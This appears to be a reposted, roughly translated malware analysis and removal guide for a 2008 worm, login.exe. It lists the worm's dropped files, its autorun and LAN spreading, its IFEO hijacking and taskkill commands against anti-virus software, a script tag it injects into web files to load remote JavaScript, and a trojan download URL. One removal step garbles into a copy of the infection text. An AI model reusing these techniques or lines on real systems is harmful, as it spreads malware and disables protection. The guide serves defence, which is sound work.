Sample information: File:login.exe
size:25428 bytes
Modified:2008 year April 25, 16:30:08
Md5:9777e8c79312f2e3d175aa1f64b07c11
sha1:4236d76c4faefe1cdf22414a25e946e493e0d52e
crc32:5a562203
1. Virus initialization: Create mutex Hgfsmutex to ensure that only one instance of the system is running
2. Release the following file or copy
%systemroot%\system32\autorun.exe
%systemroot%\system32\autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
and copy it to the Startup folder below for the purpose of starting itself up
C:\Documents and settings\administrator\"Start menu \ program \ Start \login.exe
C:\Documents and Settings\All users\"Start menu \ program \ Start \login.exe
C:\Documents and Settings\Default user\"start menu \ program \ Start \login.exe
3. Implementation of content within the Connnet.bat batch
A. Traversing the D~z disk copy%systemroot%\system32\autorun.inf and%systemroot%\system32\autorun.exe to its root directory
B. Determine if the poisoned machine is on the LAN, and if so, create an empty connection using the IPC vulnerability and copy the Autorun.exe and%autorun.inf to the machine's C $ below.
4.IFEO Hijack some anti-virus software
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmon.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmond.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravstub.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravtask.exe
Point to c:\\ I'm not going to start you. exe
5. Attempt to end 360 software
CMD/C Taskkill/im 360safe.exe/f
CMD/C Taskkill/im 360tray.exe/f
6. Traverse all disk deletes. gho files
7. Traverse all disk infected asp,htm,html,aspx,php and other files
Add <script language=javascript src=http://down.******.cn/1.js></script> code at its tail
8. Link Network Download Trojan
Http://17vp.cn/down/gr.exe to
C:\Program files\internet Explorer\1.exe
But the link has expired.
Workaround:
1. Copy the following text to the Clipboard (assuming the system is in C disk)
%systemroot%\system32\autorun.exe
%systemroot%\system32\autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
and copy it to the Startup folder below for the purpose of starting itself up
C:\Documents and settings\administrator\"Start menu \ program \ Start \login.exe
C:\Documents and Settings\All users\"Start menu \ program \ Start \login.exe
C:\Documents and Settings\Default user\"start menu \ program \ Start \login.exe
Open Xdelbox.exe
Right-click the Clipboard import do not check the path in the big box below
The list of files that you just copied will appear in the big box below
Then click "Restart now to delete" in the big box below.
The software will automatically reboot the computer
After restarting the computer, there will be a choice of two System entry countdown interface
The first one is your original Windows system.
The second is the DOS system that the software has set up for you.
Without your control, it automatically chooses to enter the second system.
After the DOS-like interface rolls over, the virus is deleted.
And then he'll automatically reboot into normal mode.
2. Open Sreng Startup entry registry
Delete all red Ifeo items
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
